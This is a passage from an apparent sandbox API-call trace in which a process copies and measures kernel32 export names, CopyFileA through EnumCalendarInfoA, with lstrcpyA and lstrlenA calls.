[0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.688] lstrlenA (lpString="COPYFILEA") returned 9 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.688] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.688] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.688] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.688] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.688] lstrlenA (lpString="COPYFILEW") returned 9 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.688] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.688] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.688] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.689] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.689] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.689] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.689] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.689] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.689] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.689] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.689] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.689] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.689] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.689] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.689] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.689] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.689] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.689] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.689] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.689] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.689] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.689] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.690] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.690] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.690] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.690] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.690] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.690] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.690] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.690] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.690] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.690] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.690] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.690] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.690] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.690] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.690] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.690] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.690] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.690] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.690] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.690] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.691] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.691] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.691] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.691] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.691] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.691] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.691] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.691] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.691] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.691] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.691] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.691] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.691] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.691] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.691] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.691] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.691] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.691] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.691] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.691] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.692] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.692] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.692] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.692] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.692] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.692] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.692] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.692] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.692] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.692] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.692] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.692] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.692] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.692] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.692] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.692] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.692] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.692] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.692] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.693] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.693] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.693] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.693] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.693] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.693] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.693] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.693] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.693] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.693] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.693] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.693] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.693] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.693] lstrlenA (lpString="DELETEATOM") returned 10 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.693] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.693] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.693] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.693] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.693] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.693] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.694] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.694] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.694] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.694] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.694] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.694] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.694] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.694] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.694] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.694] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.694] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.694] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.694] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.694] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.694] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.694] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.695] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.695] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.695] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.695] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.695] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.695] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.695] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.695] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.695] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.695] lstrcpyA (in: 